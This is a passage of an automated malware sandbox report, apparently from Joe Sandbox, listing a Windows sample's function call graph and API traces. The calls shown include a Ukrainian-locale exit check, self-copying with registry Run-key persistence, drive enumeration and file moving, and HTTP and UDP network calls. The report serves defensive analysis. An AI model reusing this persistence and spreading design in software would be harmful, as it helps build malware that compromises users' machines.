4981->4984 4993 40ee21 4981->4993 4982->4981 4985 40ecf5 GetFileSize 4983->4985 4986 40edb6 CloseHandle 4983->4986 4987 40edf2 WriteFile CloseHandle 4984->4987 4988 40ee18 4984->4988 4989 40ed11 4985->4989 4990 40edac UnmapViewOfFile 4985->4990 4986->4982 4987->4988 4991 40a660 _invalid_parameter 3 API calls 4988->4991 5001 40cca0 4989->5001 
4990->4986 4991->4993 4993->4970 4993->4971 4995 40c640 7 API calls 4996 40ed60 4995->4996 4996->4990 4997 40ed7d memcmp 4996->4997 4997->4990 4998 40ed99 4997->4998 4999 40a660 _invalid_parameter 3 API calls 4998->4999 5000 40eda2 4999->5000 5000->4990 5002 40c6d0 10 API calls 5001->5002 5003 40ccc4 5002->5003 5003->4990 5003->4995 5005 40dbed htons inet_addr setsockopt 5004->5005 5010 40dd1e 5004->5010 5006 40af30 8 API calls 5005->5006 5007 40dc66 bind lstrlenA sendto ioctlsocket 5006->5007 5013 40dcbb 5007->5013 5010->4486 5011 40dce2 5061 40aff0 shutdown closesocket 5011->5061 5012 40a490 9 API calls 5012->5013 5013->5011 5013->5012 5052 40dd40 5013->5052 5068 40e070 memset InternetCrackUrlA InternetOpenA 5014->5068 5017 40df4e 5017->4486 5019 40a660 _invalid_parameter 3 API calls 5019->5017 5023 40df1b 5023->5019 5025 40df11 SysFreeString 5025->5023 5175 40aef0 inet_addr 5029->5175 5032 40afdd 5037 40e920 5032->5037 5033 40af8c connect 5034 40afa0 getsockname 5033->5034 5035 40afd4 5033->5035 5034->5035 5178 40aff0 shutdown closesocket 5035->5178 5179 40aed0 inet_ntoa 5037->5179 5039 40e936 5040 40cea0 11 API calls 5039->5040 5041 40e955 5040->5041 5047 40db7c 5041->5047 5180 40e9a0 memset InternetCrackUrlA InternetOpenA 5041->5180 5044 40e98c 5046 40a660 _invalid_parameter 3 API calls 5044->5046 5045 40a660 _invalid_parameter 3 API calls 5045->5044 5046->5047 5047->4491 5051 40a784 5048->5051 5049 40a78a 5049->4481 5050 40a660 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5050->5051 5051->5049 5051->5050 5060 40dd5c 5052->5060 5053 40de24 5053->5013 5054 40dd78 recvfrom 5055 40dda6 StrCmpNIA 5054->5055 5056 40dd99 Sleep 5054->5056 5057 40ddc5 StrStrIA 5055->5057 5055->5060 5056->5060 5058 40dde6 StrChrA 5057->5058 5057->5060 5062 40cd50 5058->5062 5060->5053 5060->5054 5061->5010 5063 40cd5b 5062->5063 5064 40cd61 lstrlenA 5063->5064 5065 40a450 __aligned_recalloc_base 7 API calls 5063->5065 5066 40cd74 5063->5066 5067 40cd90 memcpy 5063->5067 
5064->5063 5064->5066 5065->5063 5066->5060 5067->5063 5067->5066 5069 40e111 InternetConnectA 5068->5069 5070 40de4a 5068->5070 5071 40e27a InternetCloseHandle 5069->5071 5072 40e14a HttpOpenRequestA 5069->5072 5070->5017 5081 40df60 5070->5081 5071->5070 5073 40e180 HttpSendRequestA 5072->5073 5074 40e26d InternetCloseHandle 5072->5074 5075 40e260 InternetCloseHandle 5073->5075 5077 40e19d 5073->5077 5074->5071 5075->5074 5076 40e1be InternetReadFile 5076->5077 5078 40e1eb 5076->5078 5077->5076 5077->5078 5079 40a490 9 API calls 5077->5079 5078->5075 5080 40e206 memcpy 5079->5080 5080->5077 5110 405630 5081->5110 5084 40de63 5084->5023 5091 40e8d0 5084->5091 5085 40df8a SysAllocString 5086 40dfa1 CoCreateInstance 5085->5086 5087 40e057 5085->5087 5089 40e04d SysFreeString 5086->5089 5090 40dfc6 5086->5090 5088 40a660 _invalid_parameter 3 API calls 5087->5088 5088->5084 5089->5087 5090->5089 5127 40e420 5091->5127 5094 40e2a0 5132 40e6f0 5094->5132 5099 40e850 6 API calls 5100 40e2f7 5099->5100 5106 40dee2 5100->5106 5149 40e510 5100->5149 5103 40e32f 5103->5106 5154 40e3c0 5103->5154 5104 40e510 6 API calls 5104->5103 5106->5025 5107 40cea0 5106->5107 5170 40ce10 5107->5170 5114 40563d 5110->5114 5111 405643 lstrlenA 5112 405656 5111->5112 5111->5114 5112->5084 5112->5085 5114->5111 5114->5112 5115 40a450 __aligned_recalloc_base 7 API calls 5114->5115 5117 40a660 _invalid_parameter 3 API calls 5114->5117 5118 4055d0 5114->5118 5122 405580 5114->5122 5115->5114 5117->5114 5119 4055e7 MultiByteToWideChar 5118->5119 5120 4055da lstrlenA 5118->5120 5121 40560c 5119->5121 5120->5119 5121->5114 5123 40558b 5122->5123 5124 405591 lstrlenA 5123->5124 5125 4055d0 2 API calls 5123->5125 5126 4055c7 5123->5126 5124->5123 5125->5123 5126->5114 5130 40e446 5127->5130 5128 40decd 5128->5023 5128->5094 5129 40e4c3 lstrcmpiW 5129->5130 5131 40e4db SysFreeString 5129->5131 5130->5128 5130->5129 5130->5131 5131->5130 5133 40e716 5132->5133 5134 40e2bb 5133->5134 5135 40e7a3 
lstrcmpiW 5133->5135 5134->5106 5144 40e850 5134->5144 5136 40e823 SysFreeString 5135->5136 5137 40e7b6 5135->5137 5136->5134 5138 40e3c0 2 API calls 5137->5138 5140 40e7c4 5138->5140 5139 40e815 5139->5136 5140->5136 5140->5139 5141 40e7f3 lstrcmpiW 5140->5141 5142 40e805 5141->5142 5143 40e80b SysFreeString 5141->5143 5142->5143 5143->5139 5145 40e3c0 2 API calls 5144->5145 5147 40e86b 5145->5147 5146 40e2d9 5146->5099 5146->5106 5147->5146 5148 40e6f0 6 API calls 5147->5148 5148->5146 5150 40e3c0 2 API calls 5149->5150 5152 40e52b 5150->5152 5151 40e315 5151->5103 5151->5104 5152->5151 5158 40e590 5152->5158 5155 40e3e6 5154->5155 5156 40e3fd 5155->5156 5157 40e420 2 API calls 5155->5157 5156->5106 5157->5156 5160 40e5b6 5158->5160 5159 40e6cd 5159->5151 5160->5159 5161 40e643 lstrcmpiW 5160->5161 5162 40e6c3 SysFreeString 5161->5162 5163 40e656 5161->5163 5162->5159 5164 40e3c0 2 API calls 5163->5164 5166 40e664 5164->5166 5165 40e6b5 5165->5162 5166->5162 5166->5165 5167 40e693 lstrcmpiW 5166->5167 5168 40e6a5 5167->5168 5169 40e6ab SysFreeString 5167->5169 5168->5169 5169->5165 5174 40ce1d 5170->5174 5171 40cdc0 _vscprintf wvsprintfA 5171->5174 5172 40ce38 SysFreeString 5172->5025 5173 40a490 9 API calls 5173->5174 5174->5171 5174->5172 5174->5173 5176 40af1c socket 5175->5176 5177 40af09 gethostbyname 5175->5177 5176->5032 5176->5033 5177->5176 5178->5032 5179->5039 5181 40e977 5180->5181 5182 40ea44 InternetConnectA 5180->5182 5181->5044 5181->5045 5183 40ebc4 InternetCloseHandle 5182->5183 5184 40ea7d HttpOpenRequestA 5182->5184 5183->5181 5185 40eab3 HttpAddRequestHeadersA HttpSendRequestA 5184->5185 5186 40ebb7 InternetCloseHandle 5184->5186 5187 40ebaa InternetCloseHandle 5185->5187 5190 40eafd 5185->5190 5186->5183 5187->5186 5188 40eb14 InternetReadFile 5189 40eb41 5188->5189 5188->5190 5189->5187 5190->5188 5190->5189 5191 40a490 9 API calls 5190->5191 5192 40eb5c memcpy 5191->5192 5192->5190 5199 406ff7 5193->5199 5194 407250 CoCreateInstance 
5194->5199 5195 4071cb 5197 4071d4 SysFreeString 5195->5197 5198 406f9b SysFreeString 5195->5198 5196 40a660 _invalid_parameter 3 API calls 5196->5195 5197->5198 5198->4494 5199->5194 5200 407146 SysAllocString 5199->5200 5201 407012 5199->5201 5200->5199 5200->5201 5201->5195 5201->5196 5203 40c37a 5202->5203 5204 40c37e 5202->5204 5203->4500 5206 40c330 CryptAcquireContextW 5204->5206 5207 40c36b 5206->5207 5208 40c34d CryptGenRandom CryptReleaseContext 5206->5208 5207->5203 5208->5207 5209->4513 5261 40b280 gethostname 5210->5261 5213 40b369 5213->4513 5215 40b37c strcmp 5215->5213 5216 40b391 5215->5216 5265 40aed0 inet_ntoa 5216->5265 5218 40b39f strstr 5219 40b3f0 5218->5219 5220 40b3af 5218->5220 5268 40aed0 inet_ntoa 5219->5268 5266 40aed0 inet_ntoa 5220->5266 5223 40b3bd strstr 5223->5213 5225 40b3cd 5223->5225 5224 40b3fe strstr 5226 40b40e 5224->5226 5227 40b44f 5224->5227 5267 40aed0 inet_ntoa 5225->5267 5269 40aed0 inet_ntoa 5226->5269 5271 40aed0 inet_ntoa 5227->5271 5231 40b45d strstr 5234 40b46d 5231->5234 5235 40b4ae EnterCriticalSection 5231->5235 5232 40b3db strstr 5232->5213 5232->5219 5233 40b41c strstr 5233->5213 5236 40b42c 5233->5236 5272 40aed0 inet_ntoa 5234->5272 5238 40b4c6 5235->5238 5270 40aed0 inet_ntoa 5236->5270 5246 40b4f1 5238->5246 5274 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5238->5274 5240 40b43a strstr 5240->5213 5240->5227 5241 40b47b strstr 5241->5213 5242 40b48b 5241->5242 5273 40aed0 inet_ntoa 5242->5273 5245 40b5ea LeaveCriticalSection 5245->5213 5246->5245 5248 40a240 7 API calls 5246->5248 5247 40b499 strstr 5247->5213 5247->5235 5249 40b535 5248->5249 5249->5245 5275 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5249->5275 5251 40b553 5252 40b580 5251->5252 5253 40b576 Sleep 5251->5253 5255 40b5a5 5251->5255 5254 40a660 _invalid_parameter 3 API calls 5252->5254 5253->5251 5254->5255 5255->5245 5276 40b030 5255->5276 5257->4528 5259 40b030 14 API calls 5258->5259 5260 40b023 LeaveCriticalSection 
5259->5260 5260->4520 5262 40b2a7 gethostbyname 5261->5262 5263 40b2c3 5261->5263 5262->5263 5263->5213 5264 40aed0 inet_ntoa 5263->5264 5264->5215 5265->5218 5266->5223 5267->5232 5268->5224 5269->5233 5270->5240 5271->5231 5272->5241 5273->5247 5274->5246 5275->5251 5277 40b044 5276->5277 5284 40b03f 5276->5284 5278 40a450 __aligned_recalloc_base 7 API calls 5277->5278 5280 40b058 5278->5280 5279 40b0b4 CreateFileW 5281 40b103 InterlockedExchange 5279->5281 5282 40b0d7 WriteFile FlushFileBuffers CloseHandle 5279->5282 5280->5279 5280->5284 5283 40a660 _invalid_parameter 3 API calls 5281->5283 5282->5281 5283->5284 5284->5245 5286 40d70d 5285->5286 5287 40d643 5286->5287 5288 40d731 WaitForSingleObject 5286->5288 5287->4535 5287->4536 5288->5286 5289 40d74c CloseHandle 5288->5289 5289->5286 5291 405829 memset GetModuleHandleW 5290->5291 5292 405862 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5291->5292 5292->5292 5293 4058a0 CreateWindowExW 5292->5293 5294 4058cb 5293->5294 5295 4058cd GetMessageA 5293->5295 5296 4058ff ExitThread 5294->5296 5297 4058e1 TranslateMessage DispatchMessageA 5295->5297 5298 4058f7 5295->5298 5297->5295 5298->5291 5298->5296 5320 40ec20 CreateFileW 5299->5320 5301 406cd8 ExitThread 5303 406b80 5303->5301 5304 406cc8 Sleep 5303->5304 5305 406bb9 5303->5305 5323 406340 GetLogicalDrives 5303->5323 5304->5303 5329 406260 5305->5329 5308 406bf0 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5309 406c66 wsprintfW 5308->5309 5310 406c7b wsprintfW 5308->5310 5309->5310 5335 406650 _chkstk 5310->5335 5311 406beb 5316 407407 5313->5316 5314 4074e1 Sleep 5314->5316 5315 40742f Sleep 5315->5316 5316->5314 5316->5315 5317 40745e Sleep wsprintfA DeleteUrlCacheEntry 5316->5317 5319 40ef90 64 API calls 5316->5319 5388 40eee0 InternetOpenA 5317->5388 5319->5316 5321 40ec68 5320->5321 5322 40ec4f GetFileSize CloseHandle 5320->5322 5321->5303 5322->5321 5328 40636d 5323->5328 5324 4063e6 5324->5303 5325 40637c RegOpenKeyExW 
5326 40639e RegQueryValueExW 5325->5326 5325->5328 5327 4063da RegCloseKey 5326->5327 5326->5328 5327->5328 5328->5324 5328->5325 5328->5327 5330 4062b9 5329->5330 5331 40627c 5329->5331 5330->5308 5330->5311 5370 4062c0 GetDriveTypeW 5331->5370 5334 4062ab lstrcpyW 5334->5330 5336 406667 5335->5336 5337 40666e 6 API calls 5335->5337 5336->5311 5338 406722 5337->5338 5339 406764 PathFileExistsW 5337->5339 5342 40ec20 3 API calls 5338->5342 5340 406803 PathFileExistsW 5339->5340 5341 406779 SetFileAttributesW DeleteFileW PathFileExistsW 5339->5341 5345 406814 5340->5345 5346 406859 FindFirstFileW 5340->5346 5343 4067a9 CreateDirectoryW 5341->5343 5344 4067cb PathFileExistsW 5341->5344 5347 40672e 5342->5347 5343->5344 5349 4067bc SetFileAttributesW 5343->5349 5344->5340 5350 4067dc CopyFileW 5344->5350 5351 406834 5345->5351 5352 40681c 5345->5352 5346->5336 5363 406880 5346->5363 5347->5339 5348 406745 SetFileAttributesW DeleteFileW 5347->5348 5348->5339 5349->5344 5350->5340 5354 4067f4 SetFileAttributesW 5350->5354 5356 406400 3 API calls 5351->5356 5375 406400 CoInitialize CoCreateInstance 5352->5375 5353 406942 lstrcmpW 5357 406958 lstrcmpW 5353->5357 5353->5363 5354->5340 5358 40682f SetFileAttributesW 5356->5358 5357->5363 5358->5346 5360 406b19 FindNextFileW 5360->5353 5361 406b35 FindClose 5360->5361 5361->5336 5362 40699e lstrcmpiW 5362->5363 5363->5353 5363->5360 5363->5362 5364 406a05 PathMatchSpecW 5363->5364 5366 406a83 PathFileExistsW 5363->5366 5379 406510 CreateDirectoryW wsprintfW FindFirstFileW 5363->5379 5364->5363 5365 406a26 wsprintfW SetFileAttributesW DeleteFileW 5364->5365 5365->5363 5366->5363 5367 406a99 wsprintfW wsprintfW 5366->5367 5367->5363 5368 406b03 MoveFileExW 5367->5368 5368->5360 5371 40629f 5370->5371 5372 4062e8 5370->5372 5371->5330 5371->5334 5372->5371 5373 4062fc QueryDosDeviceW 5372->5373 5373->5371 5374 406316 StrCmpNW 5373->5374 5374->5371 5376 406436 5375->5376 5378 406472 5375->5378 5377 406440 wsprintfW 5376->5377 
5376->5378 5377->5378 5378->5358 5380 406565 lstrcmpW 5379->5380 5381 40663f 5379->5381 5382 406591 5380->5382 5383 40657b lstrcmpW 5380->5383 5381->5363 5385 40660c FindNextFileW 5382->5385 5383->5382 5384 406593 wsprintfW wsprintfW 5383->5384 5384->5382 5386 4065f6 MoveFileExW 5384->5386 5385->5380 5387 406628 FindClose RemoveDirectoryW 5385->5387 5386->5385 5387->5381 5389 40ef06 InternetOpenUrlA 5388->5389 5390 40ef78 Sleep 5388->5390 5391 40ef25 HttpQueryInfoA 5389->5391 5392 40ef6e InternetCloseHandle 5389->5392 5390->5316 5393 40ef64 InternetCloseHandle 5391->5393 5394 40ef4e 5391->5394 5392->5390 5393->5392 5394->5393 5395 40cf40 5400 40b1f0 5395->5400 5399 40cf6a 5401 40b280 2 API calls 5400->5401 5402 40b1ff 5401->5402 5403 40b209 5402->5403 5404 40b20d EnterCriticalSection 5402->5404 5403->5399 5407 40cf80 InterlockedExchangeAdd 5403->5407 5405 40b22c LeaveCriticalSection 5404->5405 5405->5403 5408 40cf96 5407->5408 5409 40cf9d 5407->5409 5408->5399 5424 40d270 5409->5424 5412 40cfbd InterlockedIncrement 5421 40cfc7 5412->5421 5414 40cff0 5434 40aed0 inet_ntoa 5414->5434 5416 40cffc 5418 40d0c0 InterlockedDecrement 5416->5418 5417 40d1a0 6 API calls 5417->5421 5449 40aff0 shutdown closesocket 5418->5449 5420 40a450 __aligned_recalloc_base 7 API calls 5420->5421 5421->5414 5421->5417 5421->5418 5421->5420 5422 40a660 _invalid_parameter 3 API calls 5421->5422 5431 40b9d0 5421->5431 5435 40ba20 5421->5435 5422->5421 5425 40d27d socket 5424->5425 5426 40d292 htons connect 5425->5426 5427 40d2ef 5425->5427 5426->5427 5428 40d2da 5426->5428 5427->5425 5429 40cfad 5427->5429 5450 40aff0 shutdown closesocket 5428->5450 5429->5408 5429->5412 5451 40b930 5431->5451 5434->5416 5445 40ba31 5435->5445 5437 40ba4f 5439 40a660 _invalid_parameter 3 API calls 5437->5439 5440 40bdff 5439->5440 5440->5421 5441 40be10 21 API calls 5441->5445 5444 40b9d0 13 API calls 5444->5445 5445->5437 5445->5441 5445->5444 5446 40b330 32 API calls 5445->5446 5459 40bf60 5445->5459 5466 
40b700 EnterCriticalSection 5445->5466 5471 406e20 5445->5471 5476 406ec0 5445->5476 5481 406cf0 5445->5481 5488 406df0 5445->5488 5446->5445 5449->5408 5450->5429 5452 40c3b0 3 API calls 5451->5452 5453 40b93b 5452->5453 5454 40b957 lstrlenA 5453->5454 5455 40c640 7 API calls 5454->5455 5456 40b98d 5455->5456 5457 40b9b8 5456->5457 5458 40a660 _invalid_parameter 3 API calls 5456->5458 5457->5421 5458->5457 5460 40bf71 lstrlenA 5459->5460 5461 40c640 7 API calls 5460->5461 5464 40bf8f 5461->5464 5462 40bf9b 5463 40c01f 5462->5463 5465 40a660 _invalid_parameter 3 API calls 5462->5465 5463->5445 5464->5460 5464->5462 5465->5463 5467 40b718 5466->5467 5468 40b754 LeaveCriticalSection 5467->5468 5491 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5467->5491 5468->5445 5470 40b743 5470->5468 5492 406e60 5471->5492 5474 40d610 17 API calls 5475 406e59 5474->5475 5475->5445 5477 406e60 75 API calls 5476->5477 5478 406edf 5477->5478 5479 406f0c 5478->5479 5507 406f20 5478->5507 5479->5445 5510 405f40 EnterCriticalSection 5481->5510 5483 406d0a 5484 406d3d 5483->5484 5515 406d50 5483->5515 5484->5445 5487 40a660 _invalid_parameter 3 API calls 5487->5484 5522 406000 EnterCriticalSection 5488->5522 5490 406e12 5490->5445 5491->5470 5495 406e73 5492->5495 5493 406e34 5493->5474 5493->5475 5495->5493 5496 405e50 EnterCriticalSection 5495->5496 5497 40ccd0 71 API calls 5496->5497 5498 405e6e 5497->5498 5499 405f2b LeaveCriticalSection 5498->5499 5500 405e87 5498->5500 5503 405ea8 5498->5503 5499->5495 5501 405e91 memcpy 5500->5501 5502 405ea6 5500->5502 5501->5502 5504 40a660 _invalid_parameter 3 API calls 5502->5504 5503->5502 5506 405f06 memcpy 5503->5506 5505 405f28 5504->5505 5505->5499 5506->5502 5508 40b930 13 API calls 5507->5508 5509 406f65 5508->5509 5509->5479 5511 405f5e 5510->5511 5512 405fea LeaveCriticalSection 5511->5512 5513 40a6d0 8 API calls 5511->5513 5512->5483 5514 405fbc 5513->5514 5514->5512 5516 40a450 __aligned_recalloc_base 7 API calls 5515->5516 
5517 406d62 memcpy 5516->5517 5518 40b930 13 API calls 5517->5518 5519 406dcc 5518->5519 5520 40a660 _invalid_parameter 3 API calls 5519->5520 5521 406d31 5520->5521 5521->5487 5547 40cd30 5522->5547 5525 406243 LeaveCriticalSection 5525->5490 5526 40ccd0 71 API calls 5527 406039 5526->5527 5527->5525 5528 406158 5527->5528 5530 406094 memcpy 5527->5530 5529 406181 5528->5529 5531 405c90 75 API calls 5528->5531 5532 40a660 _invalid_parameter 3 API calls 5529->5532 5533 40a660 _invalid_parameter 3 API calls 5530->5533 5531->5529 5534 4061a2 5532->5534 5535 4060b8 5533->5535 5534->5525 5536 4061b1 CreateFileW 5534->5536 5537 40a6d0 8 API calls 5535->5537 5536->5525 5538 4061d4 5536->5538 5539 4060c8 5537->5539 5542 4061f1 WriteFile 5538->5542 5543 40622f FlushFileBuffers CloseHandle 5538->5543 5540 40a660 _invalid_parameter 3 API calls 5539->5540 5541 4060ef 5540->5541 5544 40c640 7 API calls 5541->5544 5542->5538 5543->5525 5545 406125 5544->5545 5546 4072a0 71 API calls 5545->5546 5546->5528 5550 40c280 5547->5550 5552 40c291 5550->5552 5551 40a6d0 8 API calls 5551->5552 5552->5551 5553 40c1e0 70 API calls 5552->5553 5556 407fa0 68 API calls 5552->5556 5557 40c2ab 5552->5557 5558 40c2eb memcmp 5552->5558 5553->5552 5554 40a660 _invalid_parameter 3 API calls 5555 406022 5554->5555 5555->5525 5555->5526 5556->5552 5557->5554 5558->5552 5558->5557 5720 40d400 5721 40d416 5720->5721 5738 40d46e 5720->5738 5722 40d420 5721->5722 5723 40d473 5721->5723 5724 40d4c3 5721->5724 5721->5738 5725 40a240 7 API calls 5722->5725 5727 40d498 5723->5727 5728 40d48b InterlockedDecrement 5723->5728 5747 40c070 5724->5747 5729 40d42d 5725->5729 5730 40a660 _invalid_parameter 3 API calls 5727->5730 5728->5727 5743 4023d0 5729->5743 5732 40d4a4 5730->5732 5733 40a660 _invalid_parameter 3 API calls 5732->5733 5733->5738 5735 40b1f0 4 API calls 5736 40d44f 5735->5736 5737 40d45b InterlockedIncrement 5736->5737 5736->5738 5737->5738 5740 40d521 IsBadReadPtr 5741 40d4e9 5740->5741 
5741->5738 5741->5740 5742 40ba20 194 API calls 5741->5742 5752 40c170 5741->5752 5742->5741 5744 402413 5743->5744 5745 4023d9 5743->5745 5744->5735 5745->5744 5746 4023ea InterlockedIncrement 5745->5746 5746->5744 5748 40c083 5747->5748 5749 40c0ad memcpy 5747->5749 5750 40a490 9 API calls 5748->5750 5749->5741 5751 40c0a4 5750->5751 5751->5749 5753 40c199 5752->5753 5754 40c18e 5752->5754 5753->5754 5755 40c1b1 memmove 5753->5755 5754->5741 5755->5754 5756 40da00 5766 4013b0 5756->5766 5758 40b6b0 5 API calls 5761 40da0d 5758->5761 5759 40da27 InterlockedExchangeAdd 5760 40da6b WaitForSingleObject 5759->5760 5759->5761 5760->5761 5762 40da84 5760->5762 5761->5758 5761->5759 5761->5760 5763 40b9d0 13 API calls 5761->5763 5765 40da8d 5761->5765 5778 401330 5762->5778 5763->5761 5767 40a240 7 API calls 5766->5767 5768 4013bb CreateEventA socket 5767->5768 5769 4013f2 5768->5769 5770 4013f8 5768->5770 5771 401330 8 API calls 5769->5771 5772 401401 bind 5770->5772 5773 401462 5770->5773 5771->5770 5774 401444 CreateThread 5772->5774 5775 401434 5772->5775 5773->5761 5774->5773 5788 401100 5774->5788 5776 401330 8 API calls 5775->5776 5777 40143a 5776->5777 5777->5761 5779 401339 5778->5779 5785 40139b 5778->5785 5780 401341 SetEvent WaitForSingleObject CloseHandle 5779->5780 5779->5785 5786 401369 5780->5786 5787 40138b 5780->5787 5782 401395 5784 40a660 _invalid_parameter 3 API calls 5782->5784 5783 40a660 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5783->5786 5784->5785 5785->5765 5786->5783 5786->5787 5817 40aff0 shutdown closesocket 5787->5817 5789 401115 ioctlsocket 5788->5789 5790 4011e4 5789->5790 5795 40113a 5789->5795 5791 40a660 _invalid_parameter 3 API calls 5790->5791 5793 4011ea 5791->5793 5792 4011cd WaitForSingleObject 5792->5789 5792->5790 5794 40a490 9 API calls 5794->5795 5795->5792 5795->5794 5796 401168 recvfrom 5795->5796 5797 4011ad InterlockedExchangeAdd 5795->5797 5796->5792 5796->5795 5799 401000 5797->5799 5800 401014 
5799->5800 5801 40103b 5800->5801 5802 40a240 7 API calls 5800->5802 5810 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5801->5810 5802->5801 5804 40105b 5811 401580 5804->5811 5806 4010ec 5806->5795 5807 4010a3 IsBadReadPtr 5808 401071 5807->5808 5808->5806 5808->5807 5809 4010d8 memmove 5808->5809 5809->5808 5810->5804 5812 401592 5811->5812 5813 4015a5 memcpy 5811->5813 5815 40a490 9 API calls 5812->5815 5814 4015c1 5813->5814 5814->5808 5816 40159f 5815->5816 5816->5813 5817->5782 5818 40d980 5819 40ba20 194 API calls 5818->5819 5820 40d9b8 5819->5820 5821 40d580 5826 401b60 5821->5826 5823 40d595 5824 40d5b4 5823->5824 5825 401b60 16 API calls 5823->5825 5825->5824 5827 401b70 5826->5827 5845 401c42 5826->5845 5828 40a240 7 API calls 5827->5828 5827->5845 5829 401b9d 5828->5829 5830 40a6d0 8 API calls 5829->5830 5829->5845 5831 401bc9 5830->5831 5832 401be6 5831->5832 5833 401bd6 5831->5833 5835 401ae0 4 API calls 5832->5835 5834 40a660 _invalid_parameter 3 API calls 5833->5834 5836 401bdc 5834->5836 5837 401bf3 5835->5837 5836->5823 5838 401c33 5837->5838 5839 401bfc EnterCriticalSection 5837->5839 5842 40a660 _invalid_parameter 3 API calls 5838->5842 5840 401c13 5839->5840 5841 401c1f LeaveCriticalSection 5839->5841 5840->5841 5841->5823 5843 401c3c 5842->5843 5844 40a660 _invalid_parameter 3 API calls 5843->5844 5844->5845 5845->5823 5559 4069c8 5567 40696e 5559->5567 5560 40699e lstrcmpiW 5560->5567 5561 406b19 FindNextFileW 5563 406942 lstrcmpW 5561->5563 5564 406b35 FindClose 5561->5564 5562 406a05 PathMatchSpecW 5565 406a26 wsprintfW SetFileAttributesW DeleteFileW 5562->5565 5562->5567 5566 406958 lstrcmpW 5563->5566 5563->5567 5569 406b42 5564->5569 5565->5567 5566->5567 5567->5560 5567->5561 5567->5562 5568 406a83 PathFileExistsW 5567->5568 5572 406510 11 API calls 5567->5572 5568->5567 5570 406a99 wsprintfW wsprintfW 5568->5570 5570->5567 5571 406b03 MoveFileExW 5570->5571 5571->5561 5572->5567 5573 40f34c 5574 40f354 5573->5574 5576 40f408 

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 89 40ebe0-40ec0c GetLocaleInfoA strcmp 90 40ec12 89->90 91 40ec0e-40ec10 89->91 92 40ec14-40ec17 90->92 91->92
                                                                                APIs
                                                                                • GetLocaleInfoA.KERNELBASE(00000400,00000007,?,0000000A,?,?,004075E8), ref: 0040EBF3
                                                                                • strcmp.NTDLL ref: 0040EC02
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocalestrcmp
                                                                                • String ID: UKR
                                                                                • API String ID: 3191669094-64918367
                                                                                • Opcode ID: 60baf994038672de7e905354210f4f0cccfe67ebee51479d5c5c355a5e8cecad
                                                                                • Instruction ID: 39a3b49c0f9cc0ba3e3bafda0df6f1f41861fe80aa697247161161d98fc04bc2
                                                                                • Opcode Fuzzy Hash: 60baf994038672de7e905354210f4f0cccfe67ebee51479d5c5c355a5e8cecad
                                                                                • Instruction Fuzzy Hash: 9AE0CD3594830876DA1065A15C02BA6371C5711701F0000B5AF14A21C1E5765119926B

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 407500-407534 Sleep CreateMutexA GetLastError 1 407536-407538 ExitProcess 0->1 2 40753e-4075dd GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW wcscmp 0->2 3 4075e3-4075ee call 40ebe0 2->3 4 4078a9-4078d4 Sleep RegOpenKeyExW 2->4 14 4075f0-4075f2 ExitProcess 3->14 15 4075f8-407646 ExpandEnvironmentStringsW wsprintfW CopyFileW 3->15 5 407902-407922 RegOpenKeyExW 4->5 6 4078d6-4078fc RegSetValueExA RegCloseKey 4->6 8 407924-407950 RegSetValueExA RegCloseKey 5->8 9 407955-407975 RegOpenKeyExW 5->9 6->5 11 4079fa-407a1a RegOpenKeyExW 8->11 12 407977-4079a6 RegCreateKeyExW RegCloseKey 9->12 13 4079ac-4079cc RegOpenKeyExW 9->13 17 407a1c-407a48 RegSetValueExA RegCloseKey 11->17 18 407a4d-407a6d RegOpenKeyExW 11->18 12->13 13->11 16 4079ce-4079f4 RegSetValueExA RegCloseKey 13->16 19 40764c-40767b SetFileAttributesW RegOpenKeyExW 15->19 20 4076de-407720 Sleep wsprintfW CopyFileW 15->20 16->11 23 407b49-407b69 RegOpenKeyExW 17->23 24 407aa4-407ac4 RegOpenKeyExW 18->24 25 407a6f-407a9e RegCreateKeyExW RegCloseKey 18->25 19->20 26 40767d-4076b0 wcslen RegSetValueExW 19->26 21 407726-407755 SetFileAttributesW RegOpenKeyExW 20->21 22 4077b8-407811 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 20->22 21->22 29 407757-40778a wcslen RegSetValueExW 21->29 22->4 30 407817-407846 SetFileAttributesW RegOpenKeyExW 22->30 27 407b97-407bb7 RegOpenKeyExW 23->27 28 407b6b-407b91 RegSetValueExA RegCloseKey 23->28 31 407ac6-407af5 RegCreateKeyExW RegCloseKey 24->31 32 407afb-407b1b RegOpenKeyExW 24->32 25->24 26->20 33 4076b2-4076d4 RegCloseKey call 40ee30 26->33 34 407be5-407c05 RegOpenKeyExA 27->34 35 407bb9-407bdf RegSetValueExA RegCloseKey 27->35 28->27 29->22 36 40778c-4077ae RegCloseKey call 40ee30 29->36 30->4 37 407848-40787b wcslen RegSetValueExW 30->37 31->32 32->23 38 407b1d-407b43 RegSetValueExA RegCloseKey 32->38 33->20 45 4076d6-4076d8 
